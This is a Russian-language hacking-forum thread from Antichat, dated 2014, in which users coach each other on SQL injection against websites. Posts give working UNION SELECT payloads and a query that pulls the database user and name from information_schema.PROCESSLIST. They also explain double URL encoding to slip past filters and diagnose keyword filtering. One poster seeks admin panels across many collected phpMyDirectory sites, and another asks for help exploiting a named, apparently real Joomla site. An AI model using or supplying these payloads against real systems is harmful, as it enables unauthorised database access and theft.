ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.05.2014, 21:17
|
|
Новичок
Регистрация: 22.08.2008
Сообщений: 10
Провел на форуме:
149978
Репутация:
6
|
|
Сообщение от qaz
qaz said:
спс, а как из точки получить такое содержимое, что это за тип шифрования?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку
у phpMyDirectory такие.
site.com/cp/
|
|
|
29.05.2014, 21:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
23349
Репутация:
45
|
|
qaz, это обычный url енкодинг, то бишь хекс с префиксом процента.
Иногда бывает, что один параметр участвует в двух запросах, передается с одного хоста на другой, на котором может стоять обработчик всех параметров или на самом хосте они дважды декодируются по каким-либо причинам. Как параметр пройдёт первый хост, он декодируется в привычную форму и из %2527 как пример получится %27 и этот %27 уже на втором хосте в конечном итоге превратится в привычный всем нам апостроф '
|
|
|
|
29.05.2014, 21:58
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от qaz
qaz said:
спс, а как из точки получить такое содержимое, что это за тип шифрования?
я примерно догадываюсь что это может быть хекс, только вместо 0х поставили % но как получили второй вариант?
---------------------------------------------
никто не в курсе чтоза движок в котором префикс таблиц в БД начинается на pmd, pmd_admin, pmd_users и тд,?? уже насобиралась куча таких сайтов и никак не могу найти админку
http://web-master.pp.ru/info/05.shtml
Помогает когда фильтруются и другие символы.
%2e url кодирование.
%252e двойное url кодирование.
|
|
|
|
31.05.2014, 13:49
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Имеется уязвимость на site.com , вида site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10-- '
Колонки на вывод - 1 и 6.
Вывести через них database(), user() не получается, т.к. в ответ получаю пустое место.
Зато можно вывести версию @@version , version() - 5.0.95-log
При других запросах на вывод таблиц и т.д. - либо пустое место, вместо результата (как с user() ), либо ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
Есть ли какие-нибудь идеи, как узнать пользователя и текущую базу данных из приведённых мною выше данных?
|
|
|
|
31.05.2014, 15:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Aniweste, фильтр? Попробуйте определить, на что. Или length(database()) = 0?
Код:
Code:
site.com/x.php?id=-1' union+select+USER,2,3,4,5,DB,7,8,9,10+from+information_schema.PROCESSLIST+WHERE+info+rlike+0x50524f43--+
В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.
|
|
|
|
31.05.2014, 16:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
21918
Репутация:
6
|
|
Как раскрутить такое:
Код:
Code:
SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit
где $limitstart, $limit - не фильтруются. |
|
|
|
31.05.2014, 16:47
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Для инъекции в LIMIT после ORDER BY сейчас нет векторов атак (возможно и не будет).
|
|
|
|
31.05.2014, 17:38
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
Провел на форуме:
5422
Репутация:
0
|
|
Сообщение от XAMEHA
XAMEHA said:
Aniweste,
фильтр? Попробуйте определить, на что. Или length(database()) = 0?
Код:
Code:
site.com/x.php?id=-1' union+select+USER,2,3,4,5,DB,7,8,9,10+from+information_schema.PROCESSLIST+WHERE+info+rlike+0x50524f43--+
В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте. Всё равно ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.
Нечаянно, пока дописывал, проверил
site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+fro-- - нет ошибки, site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+from-- - есть ошибка. Но думаю, что это бред
|
|
|
|
31.05.2014, 18:05
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Aniweste, всё нормально.
fro воспринимается как псевдоним для колонки, запрос корректен.
В случае с from в запрос из-за фильтра поступает муть и вы видите ошибку.
|
|
|
|
02.06.2014, 02:24
|
|
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
Провел на форуме:
1006699
Репутация:
273
|
|
Помогите разобраться, там Joomla.
http://k apper-sng.ru/insiderskaya-informaciya?start=4
пытаюсь раскрутить переменную start, но видимо мало еще понимаю механизм.
при запросе start=-4
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-4, 4' at line 13 SQL=SELECT a.id, a.title, a.alias, a.title_alias, a.introtext, a.checked_out, a.checked_out_time, a.catid, a.created, a.created_by, a.created_by_alias, CASE WHEN
пытаюсь подобрать столбцы, но не получается, не пропадает ошибка.
при start=99999 выдаётся пустая страница, без содержания. Вроде и есть инъекция (на сколько моих знаний хватает), но не могу понять, как использовать.
Покажите правильную дорогу пожалуйста. Благодарю заранее. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [dword]](/avatars/avatar35341.jpg?3727184){kind=avatar}
![Отправить сообщение для [dword] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
